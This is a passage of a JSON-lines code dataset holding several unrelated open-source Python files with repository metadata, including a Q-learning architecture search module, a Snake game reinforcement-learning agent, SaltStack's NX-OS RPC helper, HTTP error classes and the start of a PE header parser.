max_q_value = max(action_values['utilities'])\n max_q_indexes = [i for i in range(len(action_values['actions'])) if action_values['utilities'][i] == max_q_value]\n max_actions = [action_values['actions'][i] for i in max_q_indexes]\n action = se.State(state_list=max_actions[np.random.randint(len(max_actions))])\n\n self.state = self.enum.state_action_transition(self.state, action)\n self.__post_transition_updates()\n\n def __post_transition_updates(self):\n non_bucketed_state = self.state.copy()\n self.state_list.append(non_bucketed_state)\n\n def sample_replay_for_update(self):\n net = self.replay_dictionary.iloc[-1]['net']\n reward_best_val = self.replay_dictionary.iloc[-1]['reward']\n train_flag = self.replay_dictionary.iloc[-1]['train_flag']\n state_list = self.stringutils.convert_model_string_to_states(cnn_parse('net', net))\n # if train_flag:\n self.__update_q_value_sequence(state_list, 
self.__accuracy_to_reward(reward_best_val/100.))\n\n for i in range(self.state_space_parameters.replay_number-1):\n net = np.random.choice(self.replay_dictionary['net'])\n reward_best_val = self.replay_dictionary[self.replay_dictionary['net'] == net]['reward'].values[0]\n train_flag = self.replay_dictionary[self.replay_dictionary['net'] == net]['train_flag'].values[0]\n state_list = self.stringutils.convert_model_string_to_states(cnn_parse('net', net))\n # if train_flag == True:\n self.__update_q_value_sequence(state_list, self.__accuracy_to_reward(reward_best_val/100.)) \n\n def __accuracy_to_reward(self, acc):\n return acc\n\n def __update_q_value_sequence(self, states, termination_reward):\n self.__update_q_value(states[-2], states[-1], termination_reward)\n for i in reversed(range(len(states) - 2)):\n \n # TODO: q-learning update (set proper q-learning rate in cmdparser.py)\n self.__update_q_value(states[i], states[i+1], 0)\n\n # TODO: modified update for shorter search schedules (doesn't use q-learning rate in computation)\n # self.__update_q_value(states[i], states[i+1], termination_reward)\n\n def __update_q_value(self, start_state, to_state, reward):\n if start_state.as_tuple() not in self.qstore.q:\n self.enum.enumerate_state(start_state, self.qstore.q)\n if to_state.as_tuple() not in self.qstore.q:\n self.enum.enumerate_state(to_state, self.qstore.q)\n\n actions = self.qstore.q[start_state.as_tuple()]['actions']\n values = self.qstore.q[start_state.as_tuple()]['utilities']\n\n max_over_next_states = max(self.qstore.q[to_state.as_tuple()]['utilities']) if to_state.terminate != 1 else 0\n action_between_states = self.enum.transition_to_action(start_state, to_state).as_tuple()\n\n # TODO: q-learning update (set proper q-learning rate in cmdparser.py)\n values[actions.index(action_between_states)] = values[actions.index(action_between_states)] + \\\n self.args.q_learning_rate * \\\n (reward + self.args.q_discount_factor *\n max_over_next_states -\n values[actions.index(action_between_states)])\n\n # TODO: modified update for shorter search schedules (doesn't use q-learning rate in computation)\n # values[actions.index(action_between_states)] = values[actions.index(action_between_states)] + \\\n # (max(reward, values[actions.index(action_between_states)]) -\n # values[actions.index(action_between_states)])\n\n self.qstore.q[start_state.as_tuple()] = {'actions': actions, 'utilities': values}\n","repo_name":"SAGNIKMJR/MetaQNN_ImageClassification_PyTorch","sub_path":"lib/MetaQNN/q_learner.py","file_name":"q_learner.py","file_ext":"py","file_size_in_byte":20611,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"78"} +{"seq_id":"28342821269","text":"from fastapi import APIRouter, Header\nfrom ..models.stream import Proxy\n\nroutes = APIRouter()\n\n@routes.get(\"/proxy\")\nasync def main(token: str, Range: str = Header(None)):\n range_header = Range\n \n if range_header is None:\n range_header = \"bytes=0-\"\n \n proxy = Proxy(token, range_header)\n return await proxy.stream()\n\n# @routes.get(\"/teste/hentais\")\n# async def teste_hentais():\n# a = AssistirHentais(\"https://www.assistirhentai.com/episodio/isekai-kita-node-sukebe-skill-de-zenryoku-ouka-shiyou-to-omou-episodio-01/\")\n# return 
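# The __update_q_value method in the q_learner.py record above applies the
# standard tabular Q-learning (temporal-difference) update. A minimal sketch of
# that rule, assuming toy values for the learning rate, discount factor and
# Q-table entries (they are not the repository's actual hyperparameters):
def q_update(q_value, reward, max_next_q, lr=0.1, gamma=0.9):
    # Q(s,a) <- Q(s,a) + lr * (reward + gamma * max_a' Q(s',a') - Q(s,a))
    return q_value + lr * (reward + gamma * max_next_q - q_value)

q_table = {("s0", "a0"): 0.5}
q_table[("s0", "a0")] = q_update(q_table[("s0", "a0")], reward=1.0, max_next_q=0.8)
print(q_table)  # {('s0', 'a0'): 0.622} -- nudged from 0.5 toward the TD target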
a.get_video_link_from_iframe()","repo_name":"Animarubr/video_proxy","sub_path":"app/routes/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"72876906811","text":"import torch\nimport random\nimport numpy as np\nfrom collections import deque\nfrom snakegame import SnakeGameAI, Direction, Point\nfrom model import Linear_QNet, QTrainer\nfrom helper import plot\n\nMAX_MEMORY = 100_000\nBATCH_SIZE = 1000\nLR = 0.001\n\nclass Agent:\n \n def __init__(self):\n self.n_games = 0\n self.epsilon = 0 # control the randomness of the agent\n self.gamma = 0.9 # discount rate\n self.memory = deque(maxlen=MAX_MEMORY) # If we exed the memory, it will automatically train remove element from the left -> popleft()\n self.model = Linear_QNet(11, 256, 3)\n self.trainer = QTrainer(self.model, lr=LR, gamma=self.gamma)\n \n \n def get_state(self, snakegame):\n head = snakegame.snake[0]\n \n #Create 4 point arround the head - 20 is for the bloc size on snakegame.py\n point_l = Point(head.x -20, head.y)\n point_r = Point(head.x +20, head.y)\n point_u = Point(head.x, head.y -20)\n point_d = Point(head.x, head.y +20)\n \n # Boolean to know if the point is in the snake -> only one set to TRUE=1 other to FALSE=0\n dir_l = snakegame.direction == Direction.LEFT\n dir_r = snakegame.direction == Direction.RIGHT\n dir_u = snakegame.direction == Direction.UP\n dir_d = snakegame.direction == Direction.DOWN\n \n state = [\n #Dange straigh ahead\n (dir_r and snakegame.is_collision(point_r)) or \n (dir_l and snakegame.is_collision(point_l)) or \n (dir_u and snakegame.is_collision(point_u)) or\n (dir_d and snakegame.is_collision(point_d)),\n \n #Danger on the right\n (dir_d and snakegame.is_collision(point_r)) or\n (dir_u and snakegame.is_collision(point_l)) or\n (dir_r and snakegame.is_collision(point_u)) or\n (dir_l and snakegame.is_collision(point_d)),\n \n #Danger on the left\n (dir_d and snakegame.is_collision(point_r)) or\n (dir_u and snakegame.is_collision(point_l)) or\n (dir_r and snakegame.is_collision(point_u)) or\n (dir_l and snakegame.is_collision(point_d)),\n \n #Move direction\n dir_l,\n dir_r,\n dir_u,\n dir_d,\n \n #Food location\n snakegame.food.x < snakegame.head.x, #food on the left\n snakegame.food.x > snakegame.head.x, #food on the right\n snakegame.food.y < snakegame.head.y, #food on the top\n snakegame.food.y > snakegame.head.y #food on the bottom\n ]\n \n return np.array(state, dtype=int)\n \n \n def remember(self, state, action, reward, next_state, done):\n # If it exced the maxumum memory, it will remove the oldest element -> popleft()\n self.memory.append((state, action, reward, next_state, done))\n \n def train_long_memory(self):\n if len(self.memory) > BATCH_SIZE:\n # Return a list of tuples (a finite ordered list (sequence) of elements.)\n mini_sample = random.sample(self.memory, BATCH_SIZE)\n else:\n mini_sample = self.memory\n \n states, actions, rewards, next_states, dones = zip(*mini_sample)\n self.trainer.train_step(states, actions, rewards, next_states, dones)\n \n def train_short_memory(self, state, action, reward, next_state, done):\n self.trainer.train_step(state, action, reward, next_state, done)\n \n def get_action(self, state):\n # Random action : tradeoff between randomness and exploitation\n self.epsilon = 80 - self.n_games # More game played = smaller epsilon (epsilon = how many games played)\n final_move = [0,0,0]\n if random.randint(0, 200) < 
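# The proxy route in the routes.py record above falls back to "bytes=0-" when
# no Range header is supplied. A small sketch of parsing that header format;
# the helper name and return shape are illustrative assumptions, not part of
# the project's code:
def parse_range(header, default="bytes=0-"):
    header = header or default
    unit, _, rng = header.partition("=")
    start, _, end = rng.partition("-")
    return unit, int(start), (int(end) if end else None)

print(parse_range(None))             # ('bytes', 0, None)
print(parse_range("bytes=100-200"))  # ('bytes', 100, 200)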
self.epsilon: #\n move = random.randint(0, 2)\n final_move[move] = 1\n else:\n state0 = torch.tensor(state, dtype=torch.float)\n prediction = self.model(state0)\n move = torch.argmax(prediction).item()\n final_move[move] = 1\n \n return final_move\n \ndef train():\n plot_scores = []\n plot_mean_scores = []\n total_score = 0\n record = 0\n agent = Agent()\n snakegame = SnakeGameAI()\n while True:\n # get the old state of the current state\n state_old = agent.get_state(snakegame)\n \n #Get moove of the final state\n final_move = agent.get_action(state_old)\n \n # perform move and get new state\n reward, done, score = snakegame.play_step(final_move)\n state_new = agent.get_state(snakegame)\n \n # Train short memory\n agent.train_short_memory(state_old, final_move, reward, state_new, done)\n \n # Remember the old state, action, reward, new state, done\n agent.remember(state_old, final_move, reward, state_new, done)\n \n if done:\n # train long memory + plot the result\n snakegame.reset()\n agent.n_games += 1\n agent.train_long_memory()\n \n if score > record:\n record = score\n agent.model.save()\n \n print('game', agent.n_games, 'score', score, 'record', record)\n \n plot_scores.append(score)\n total_score += score\n mean_score = total_score / agent.n_games\n plot_mean_scores.append(mean_score)\n plot(plot_scores, plot_mean_scores)\n \nif __name__ == '__main__':\n train()","repo_name":"IMPWNG/SnakeGame_AI","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":5588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"167271559","text":"import os\nimport argparse\n\n\ndef sync_intrinsics_and_poses(cam_file, pose_file, out_file):\n \"\"\"Load camera intrinsics\"\"\"\n assert os.path.isfile(cam_file), \"camera info:{} not found\".format(cam_file)\n with open(cam_file, \"r\") as f:\n cam_intrinsic_lines = f.readlines()\n \n cam_intrinsics = []\n for line in cam_intrinsic_lines:\n line_data_list = line.split(',')\n if len(line_data_list) == 0:\n continue\n cam_intrinsics.append([float(i) for i in line_data_list])\n\n \"\"\"load camera poses\"\"\"\n assert os.path.isfile(pose_file), \"camera info:{} not found\".format(pose_file)\n with open(pose_file, \"r\") as f:\n cam_pose_lines = f.readlines()\n\n cam_poses = []\n for line in cam_pose_lines:\n line_data_list = line.split(',')\n if len(line_data_list) == 0:\n continue\n cam_poses.append([float(i) for i in line_data_list])\n\n \n lines = []\n ip = 0\n length = len(cam_poses)\n for i in range(len(cam_intrinsics)):\n while ip + 1< length and abs(cam_poses[ip + 1][0] - cam_intrinsics[i][0]) < abs(cam_poses[ip][0] - cam_intrinsics[i][0]):\n ip += 1\n cam_pose = cam_poses[ip][:4] + cam_poses[ip][5:] + [cam_poses[ip][4]]\n line = [str(a) for a in cam_pose]\n # line = [str(a) for a in cam_poses[ip]]\n line[0] = str(i).zfill(5)\n lines.append(' '.join(line) + '\\n')\n \n dirname = os.path.dirname(out_file)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n\n with open(out_file, 'w') as f:\n f.writelines(lines)\n\n \nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--cam_file', type=str, default='../Frames.txt')\n parser.add_argument('--pose_file', type=str, default='../ARPoses.txt')\n parser.add_argument('--out_file', type=str, default='../SyncedPoses.txt')\n args = parser.parse_args()\n sync_intrinsics_and_poses(args.cam_file, args.pose_file, 
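# get_action in the snake-game agent.py record above mixes exploration and
# exploitation with an epsilon that shrinks as more games are played. A
# dependency-free sketch of the same epsilon-greedy idea; the q_values list
# stands in for the network prediction and is an assumption of the sketch:
import random

def epsilon_greedy(q_values, n_games):
    epsilon = 80 - n_games  # more games played -> less random exploration
    if random.randint(0, 200) < epsilon:
        return random.randrange(len(q_values))                   # explore
    return max(range(len(q_values)), key=lambda i: q_values[i])  # exploit

print(epsilon_greedy([0.1, 0.7, 0.2], n_games=100))  # epsilon <= 0 here, so always index 1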
args.out_file)","repo_name":"neu-vi/PlanarRecon","sub_path":"tools/sync_poses.py","file_name":"sync_poses.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":257,"dataset":"github-code","pt":"78"} +{"seq_id":"12849994854","text":"\"\"\"\nUtil functions for the NXOS API modules.\n\"\"\"\n\nimport json\nimport logging\n\nimport salt.utils.http\nfrom salt.exceptions import SaltException\nfrom salt.utils.args import clean_kwargs\n\nlog = logging.getLogger(__name__)\n\nRPC_INIT_KWARGS = [\n \"transport\",\n \"host\",\n \"username\",\n \"password\",\n \"port\",\n \"timeout\",\n \"verify\",\n \"rpc_version\",\n]\n\n\ndef _prepare_connection(**nxos_api_kwargs):\n \"\"\"\n Prepare the connection with the remote network device, and clean up the key\n value pairs, removing the args used for the connection init.\n \"\"\"\n nxos_api_kwargs = clean_kwargs(**nxos_api_kwargs)\n init_kwargs = {}\n # Clean up any arguments that are not required\n for karg, warg in nxos_api_kwargs.items():\n if karg in RPC_INIT_KWARGS:\n init_kwargs[karg] = warg\n if \"host\" not in init_kwargs:\n init_kwargs[\"host\"] = \"localhost\"\n if \"transport\" not in init_kwargs:\n init_kwargs[\"transport\"] = \"https\"\n if \"port\" not in init_kwargs:\n init_kwargs[\"port\"] = 80 if init_kwargs[\"transport\"] == \"http\" else 443\n verify = init_kwargs.get(\"verify\", True)\n if isinstance(verify, bool):\n init_kwargs[\"verify_ssl\"] = verify\n else:\n init_kwargs[\"ca_bundle\"] = verify\n if \"rpc_version\" not in init_kwargs:\n init_kwargs[\"rpc_version\"] = \"2.0\"\n if \"timeout\" not in init_kwargs:\n init_kwargs[\"timeout\"] = 60\n return init_kwargs\n\n\ndef rpc(commands, method=\"cli\", **kwargs):\n \"\"\"\n Execute an arbitrary RPC request via the Nexus API.\n\n commands\n The commands to be executed.\n\n method: ``cli``\n The type of the response, i.e., raw text (``cli_ascii``) or structured\n document (``cli``). Defaults to ``cli`` (structured data).\n\n transport: ``https``\n Specifies the type of connection transport to use. Valid values for the\n connection are ``http``, and ``https``.\n\n host: ``localhost``\n The IP address or DNS host name of the connection device.\n\n username: ``admin``\n The username to pass to the device to authenticate the NX-API connection.\n\n password\n The password to pass to the device to authenticate the NX-API connection.\n\n port\n The TCP port of the endpoint for the NX-API connection. If this keyword is\n not specified, the default value is automatically determined by the\n transport type (``80`` for ``http``, or ``443`` for ``https``).\n\n timeout: ``60``\n Time in seconds to wait for the device to respond. Default: 60 seconds.\n\n verify: ``True``\n Either a boolean, in which case it controls whether we verify the NX-API\n TLS certificate, or a string, in which case it must be a path to a CA bundle\n to use. 
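# sync_poses.py above pairs each camera-intrinsics timestamp with the closest
# pose timestamp using a single forward-moving index, which works because both
# lists are sorted by time. A standalone sketch of that two-pointer matching
# with made-up timestamps:
def match_nearest(query_times, ref_times):
    matches, ip = [], 0
    for t in query_times:
        while ip + 1 < len(ref_times) and abs(ref_times[ip + 1] - t) < abs(ref_times[ip] - t):
            ip += 1
        matches.append(ip)
    return matches

print(match_nearest([0.0, 1.0, 2.0], [0.1, 0.4, 1.1, 2.2]))  # [0, 2, 3]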
Defaults to ``True``.\n \"\"\"\n init_args = _prepare_connection(**kwargs)\n log.error(\"These are the init args:\")\n log.error(init_args)\n url = \"{transport}://{host}:{port}/ins\".format(\n transport=init_args[\"transport\"], host=init_args[\"host\"], port=init_args[\"port\"]\n )\n headers = {\"content-type\": \"application/json-rpc\"}\n payload = []\n if not isinstance(commands, (list, tuple)):\n commands = [commands]\n for index, command in enumerate(commands):\n payload.append(\n {\n \"jsonrpc\": init_args[\"rpc_version\"],\n \"method\": method,\n \"params\": {\"cmd\": command, \"version\": 1},\n \"id\": index + 1,\n }\n )\n opts = {\"http_request_timeout\": init_args[\"timeout\"]}\n response = salt.utils.http.query(\n url,\n method=\"POST\",\n opts=opts,\n data=json.dumps(payload),\n header_dict=headers,\n decode=True,\n decode_type=\"json\",\n **init_args\n )\n if \"error\" in response:\n raise SaltException(response[\"error\"])\n response_list = response[\"dict\"]\n if isinstance(response_list, dict):\n response_list = [response_list]\n for index, command in enumerate(commands):\n response_list[index][\"command\"] = command\n return response_list\n","repo_name":"saltstack/salt","sub_path":"salt/utils/nxos_api.py","file_name":"nxos_api.py","file_ext":"py","file_size_in_byte":4093,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} +{"seq_id":"7987370560","text":"from math import ceil\nfrom math import sqrt\nimport time\n\nstartTime=time.time()\narr=[None]*1001;\nfor i in range(1001):\n if arr[i]!=1:\n arr[i]=i\narr[1]=0;\nfor i in range(2,ceil(sqrt(1000))):\n for j in range(i+1,1001):\n if arr[i]!=0 and arr[j]!=0:\n if arr[j]%arr[i]==0:\n arr[j]=0;\nendTime=time.time()\nprint(\"筛选方法的时间是\",endTime-startTime)\n\nstartTime=time.time()\narr=[]\nfor i in range(2,1001):\n count=0\n for j in range(2,i):\n if i%j!=0:\n count+=1\n if count==i-2:\n arr.append(i);\nendTime=time.time()\nprint(\"弱智方法的时间是\",endTime-startTime)\n","repo_name":"LPLng/Grade-2","sub_path":"primeNumber.py","file_name":"primeNumber.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16145492272","text":"#\n# growler/http/errors.py\n#\n\"\"\"\nCustom Exception subclasses relating to specific http errors.\n\"\"\"\n\nimport sys\nfrom urllib.error import HTTPError as UrllibHttpError\nfrom growler.http import HttpStatus\nfrom growler.utils.metaclasses import ItemizedMeta\n\n\nclass HTTPError(UrllibHttpError, metaclass=ItemizedMeta):\n \"\"\"\n Generic HTTP Exception.\n\n Must be constructed with a code number, may be given an optional phrase.\n It is recommended to use one of the subclasses which is defined below.\n A helper function exists to get the appropriate error from a code:\n raise HTTPError.get_from_code(404)\n raise HTTPErrorNotFound()\n \"\"\"\n\n _msg = None\n code = 0\n code_to_error = dict()\n\n def __init__(self, url=None, code=None, phrase=None, msg=None, ex=None):\n \"\"\"\n Construct an http error, if code or phrase not defined, use default.\n \"\"\"\n super().__init__(url, code or self.status.value, msg or self.msg, None, None)\n self.phrase = phrase or self.msg\n self.sys_exception = ex\n self.traceback = sys.exc_info()[2]\n\n def PrintSysMessage(self, printraceback=True):\n if self.sys_exception:\n print(self.sys_exception)\n if printraceback and self.traceback:\n print(self.traceback)\n\n @classmethod\n def get_from_code(cls, code):\n \"\"\"\n A 
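# The primeNumber.py record above times a sieve-style filter against a naive
# divisibility count. For comparison, a compact standard Sieve of Eratosthenes;
# the limit of 1000 simply mirrors the record and is otherwise arbitrary:
def sieve(limit):
    is_prime = [True] * (limit + 1)
    is_prime[0] = is_prime[1] = False
    for i in range(2, int(limit ** 0.5) + 1):
        if is_prime[i]:
            for j in range(i * i, limit + 1, i):
                is_prime[j] = False
    return [n for n, flag in enumerate(is_prime) if flag]

print(len(sieve(1000)))  # 168 primes up to 1000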
simple way of getting the Exception class of an http error from http\n error code.\n \"\"\"\n return cls.code_to_error.get(code)\n\n @property\n def msg(self):\n return self._msg or self.status.phrase\n\n @msg.setter\n def msg(self, value):\n self._msg = str(value)\n\n @classmethod\n def _getitem_(cls, key):\n if isinstance(key, int):\n # key by code\n err = cls.get_from_code(key)\n if err is not None:\n return err\n elif isinstance(key, str):\n # key by phrase\n for error in cls.code_to_error.values():\n if error.status.phrase == key:\n return error\n raise HTTPErrorInvalidHttpError\n\n\nclass HTTPErrorBadRequest(HTTPError):\n status = HttpStatus.BAD_REQUEST\n\n\nclass HTTPErrorInvalidHeader(HTTPErrorBadRequest):\n msg = \"Bad Request (Invalid Header Name)\"\n\n\nclass HTTPErrorUnauthorized(HTTPError):\n status = HttpStatus.UNAUTHORIZED\n\n\nclass HTTPErrorPaymentRequired(HTTPError):\n status = HttpStatus.PAYMENT_REQUIRED\n\n\nclass HTTPErrorForbidden(HTTPError):\n status = HttpStatus.FORBIDDEN\n\n\nclass HTTPErrorNotFound(HTTPError):\n status = HttpStatus.NOT_FOUND\n\n\nclass HTTPErrorMethodNotAllowed(HTTPError):\n status = HttpStatus.METHOD_NOT_ALLOWED\n\n\nclass HTTPErrorNotAcceptable(HTTPError):\n status = HttpStatus.NOT_ACCEPTABLE\n\n\nclass HTTPErrorProxyAuthenticationRequired(HTTPError):\n status = HttpStatus.PROXY_AUTHENTICATION_REQUIRED\n\n\nclass HTTPErrorRequestTimeout(HTTPError):\n status = HttpStatus.REQUEST_TIMEOUT\n\n\nclass HTTPErrorConflict(HTTPError):\n status = HttpStatus.CONFLICT\n\n\nclass HTTPErrorGone(HTTPError):\n status = HttpStatus.GONE\n\n\nclass HTTPErrorLengthRequired(HTTPError):\n status = HttpStatus.LENGTH_REQUIRED\n\n\nclass HTTPErrorPreconditionFailed(HTTPError):\n status = HttpStatus.PRECONDITION_FAILED\n\n\nclass HTTPErrorRequestEntityTooLarge(HTTPError):\n status = HttpStatus.REQUEST_ENTITY_TOO_LARGE\n\n\nclass HTTPErrorRequestUriTooLarge(HTTPError):\n status = HttpStatus.REQUEST_URI_TOO_LONG\n\n\nclass HTTPErrorUnsupportedMediaType(HTTPError):\n status = HttpStatus.UNSUPPORTED_MEDIA_TYPE\n\n\nclass HTTPErrorRequestedRangeNotSatisfiable(HTTPError):\n status = HttpStatus.REQUESTED_RANGE_NOT_SATISFIABLE\n\n\nclass HTTPErrorExpectationFailed(HTTPError):\n status = HttpStatus.EXPECTATION_FAILED\n\n\nclass HTTPErrorUnprocessableEntity(HTTPError):\n status = HttpStatus.UNPROCESSABLE_ENTITY\n\n\nclass HTTPErrorLocked(HTTPError):\n status = HttpStatus.LOCKED\n\n\nclass HTTPErrorFailedDependency(HTTPError):\n status = HttpStatus.FAILED_DEPENDENCY\n\n\nclass HTTPErrorUpgradeRequired(HTTPError):\n status = HttpStatus.UPGRADE_REQUIRED\n\n\nclass HTTPErrorPreconditionRequired(HTTPError):\n status = HttpStatus.PRECONDITION_REQUIRED\n\n\nclass HTTPErrorTooManyRequests(HTTPError):\n status = HttpStatus.TOO_MANY_REQUESTS\n\n\nclass HTTPErrorRequestHeaderFieldsTooLarge(HTTPError):\n status = HttpStatus.REQUEST_HEADER_FIELDS_TOO_LARGE\n\n\nclass HTTPErrorInternalServerError(HTTPError):\n status = HttpStatus.INTERNAL_SERVER_ERROR\n\n\nclass HTTPErrorInvalidHttpError(HTTPErrorInternalServerError):\n msg = \"Server attempted to raise invalid HTTP error\"\n\n\nclass HTTPErrorNotImplemented(HTTPError):\n status = HttpStatus.NOT_IMPLEMENTED\n\n\nclass HTTPErrorBadGateway(HTTPError):\n status = HttpStatus.BAD_GATEWAY\n\n\nclass HTTPErrorServiceUnavailable(HTTPError):\n status = HttpStatus.SERVICE_UNAVAILABLE\n\n\nclass HTTPErrorGatewayTimeout(HTTPError):\n status = HttpStatus.GATEWAY_TIMEOUT\n\n\nclass HTTPErrorVersionNotSupported(HTTPError):\n status = 
HttpStatus.HTTP_VERSION_NOT_SUPPORTED\n\n\nclass HTTPErrorVariantAlsoNegotiates(HTTPError):\n status = HttpStatus.VARIANT_ALSO_NEGOTIATES\n\n\nclass HTTPErrorInsufficientStorage(HTTPError):\n status = HttpStatus.INSUFFICIENT_STORAGE\n\n\nclass HTTPErrorLoopDetected(HTTPError):\n status = HttpStatus.LOOP_DETECTED\n\n\nclass HTTPErrorNotExtended(HTTPError):\n status = HttpStatus.NOT_EXTENDED\n\n\nclass HTTPErrorNetworkAuthenticationRequired(HTTPError):\n status = HttpStatus.NETWORK_AUTHENTICATION_REQUIRED\n\n\nHTTPError.code_to_error = {\n 400: HTTPErrorBadRequest,\n 401: HTTPErrorUnauthorized,\n 402: HTTPErrorPaymentRequired,\n 403: HTTPErrorForbidden,\n 404: HTTPErrorNotFound,\n 405: HTTPErrorMethodNotAllowed,\n 406: HTTPErrorNotAcceptable,\n 407: HTTPErrorProxyAuthenticationRequired,\n 408: HTTPErrorRequestTimeout,\n 409: HTTPErrorConflict,\n 410: HTTPErrorGone,\n 411: HTTPErrorLengthRequired,\n 412: HTTPErrorPreconditionFailed,\n 413: HTTPErrorRequestEntityTooLarge,\n 414: HTTPErrorRequestUriTooLarge,\n 415: HTTPErrorUnsupportedMediaType,\n 416: HTTPErrorRequestedRangeNotSatisfiable,\n 417: HTTPErrorExpectationFailed,\n 422: HTTPErrorUnprocessableEntity,\n 423: HTTPErrorLocked,\n 424: HTTPErrorFailedDependency,\n 426: HTTPErrorUpgradeRequired,\n 428: HTTPErrorPreconditionRequired,\n 429: HTTPErrorTooManyRequests,\n 431: HTTPErrorRequestHeaderFieldsTooLarge,\n\n 500: HTTPErrorInternalServerError,\n 501: HTTPErrorNotImplemented,\n 502: HTTPErrorBadGateway,\n 503: HTTPErrorServiceUnavailable,\n 504: HTTPErrorGatewayTimeout,\n 505: HTTPErrorVersionNotSupported,\n 506: HTTPErrorVariantAlsoNegotiates,\n 507: HTTPErrorInsufficientStorage,\n 508: HTTPErrorLoopDetected,\n 510: HTTPErrorNotExtended,\n 511: HTTPErrorNetworkAuthenticationRequired,\n}\n\n__all__ = [\n # generic error\n 'HTTPError',\n\n # -- 4XX errors\n 'HTTPErrorBadRequest',\n 'HTTPErrorUnauthorized',\n 'HTTPErrorPaymentRequired',\n 'HTTPErrorForbidden',\n 'HTTPErrorNotFound',\n 'HTTPErrorMethodNotAllowed',\n 'HTTPErrorNotAcceptable',\n 'HTTPErrorProxyAuthenticationRequired',\n 'HTTPErrorRequestTimeout',\n 'HTTPErrorConflict',\n 'HTTPErrorGone',\n 'HTTPErrorLengthRequired',\n 'HTTPErrorPreconditionFailed',\n 'HTTPErrorRequestEntityTooLarge',\n 'HTTPErrorRequestUriTooLarge',\n 'HTTPErrorUnsupportedMediaType',\n 'HTTPErrorRequestedRangeNotSatisfiable',\n 'HTTPErrorExpectationFailed',\n 'HTTPErrorUnprocessableEntity',\n 'HTTPErrorLocked',\n 'HTTPErrorFailedDependency',\n 'HTTPErrorUpgradeRequired',\n 'HTTPErrorPreconditionRequired',\n 'HTTPErrorTooManyRequests',\n 'HTTPErrorRequestHeaderFieldsTooLarge',\n\n # -- 5XX errors\n 'HTTPErrorInternalServerError',\n 'HTTPErrorNotImplemented',\n 'HTTPErrorBadGateway',\n 'HTTPErrorServiceUnavailable',\n 'HTTPErrorGatewayTimeout',\n 'HTTPErrorVersionNotSupported',\n 'HTTPErrorVariantAlsoNegotiates',\n 'HTTPErrorInsufficientStorage',\n 'HTTPErrorLoopDetected',\n 'HTTPErrorNotExtended',\n 'HTTPErrorNetworkAuthenticationRequired',\n\n # -- derived errors\n 'HTTPErrorInvalidHeader',\n 'HTTPErrorInvalidHttpError',\n]\n","repo_name":"pyGrowler/Growler","sub_path":"growler/http/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":8216,"program_lang":"python","lang":"en","doc_type":"code","stars":688,"dataset":"github-code","pt":"78"} +{"seq_id":"35674058434","text":"# header sizes\nSIZE_OF_PE = 24\nSIZE_OF_SECTION_HEADER = 40\nSIZE_OF_IMPORT_DIRECTORY = 20\n\nINDENT = 5\n\nBYTES_8 = 8\nBYTES_4 = 4\nBYTES_2 = 2\nBYTES_1 = 1\n\n#returns a underlined string with the desiered times of 
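# errors.py above keeps an explicit code -> exception-class dictionary. One
# alternative way to express the same lookup is to let subclasses register
# themselves; this sketch is an illustration of that idea, not Growler's
# actual API:
class HttpError(Exception):
    code = 0
    registry = {}

    def __init_subclass__(cls, **kwargs):
        super().__init_subclass__(**kwargs)
        if cls.code:
            HttpError.registry[cls.code] = cls

class NotFound(HttpError):
    code = 404

class InternalServerError(HttpError):
    code = 500

def error_for(code):
    return HttpError.registry.get(code, HttpError)

print(error_for(404).__name__)  # NotFound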
indentation\ndef format_string(string, indent_times):\n return '{}{}\\n{}{}\\n'.format(INDENT * indent_times * \" \", string, INDENT * indent_times * \" \", len(string) * \"=\")\n\n#gets the dll name from the data starting at the given pointer\ndef get_dll_name(rva, data, num_of_sections, pe_header_offset, opt_header_size):\n string = \"\"\n i = 0\n phis_off = RVA_to_offset(data, rva, num_of_sections, pe_header_offset, opt_header_size)\n\n while data[phis_off + i] != 0:\n string += chr(data[phis_off + i])\n i += 1\n\n return string\n\n# function that converts relative virtual address to the physical offset\ndef RVA_to_offset(data, rva, num_of_sections, pe_header_offset, opt_header_size):\n section_info = find_section(data, rva, num_of_sections, pe_header_offset, opt_header_size)\n\n return rva + section_info[1] - section_info[0]\n\n# function that determines which section does the relative virtual address fall in and returns the pointer to the start of that section\ndef find_section(data, rva, num_of_sections, pe_header_offset, opt_header_size):\n sections_pointer = pe_header_offset + SIZE_OF_PE + opt_header_size\n\n for i in range(num_of_sections):\n is_in_section = little_endian(data, sections_pointer + 12, 4) <= rva <= \\\n little_endian(data, sections_pointer + 12, 4) + little_endian(data, sections_pointer + 8, 4)\n\n if is_in_section:\n return little_endian(data, sections_pointer + 12, 4), little_endian(data, sections_pointer + 20, 4)\n\n sections_pointer += SIZE_OF_SECTION_HEADER\n\n# if anything happens that we don't want this function is called, error message is outputed and the program is stoped\ndef error_wrong_format():\n print(\"File not the right format!\")\n exit(0)\n\n# this function converts data from a file in to it's little endian representation in a form of a integer\ndef little_endian(data, pointer, size):\n return int.from_bytes(data[pointer:pointer + size], \"little\")\n\n# takes an integer that is a representation of a hex value and makes a hex value in string format padded with leading zeros to the wanted numbers of bytes\ndef add_padding_str(value, bytes):\n return '0x{0:0{1}X}'.format(value, bytes*2)\n\n# this function makes an array of tables that go to the end of the optional header\ndef return_tables(data, pointer, size):\n table_list = []\n pom_pointer = pointer\n for i in range(size):\n table_list.append(data_dir(little_endian(data, pom_pointer, 4), little_endian(data, pom_pointer + 4, 4)))\n pom_pointer += BYTES_8\n\n return table_list\n\n# takes an integer representing a hex value in little endian and returns ASCII string of it\ndef string_from_int_representation_of_hex(value):\n name_to_convert = str(hex(value)).partition(\"x\")[2]\n name = bytes.fromhex(name_to_convert).decode('utf-8')\n\n return name[::-1]\n\n# takes array of section headers and it returns them as a formatted string with all it's parts\ndef section_headers_merge(section_headers):\n output = 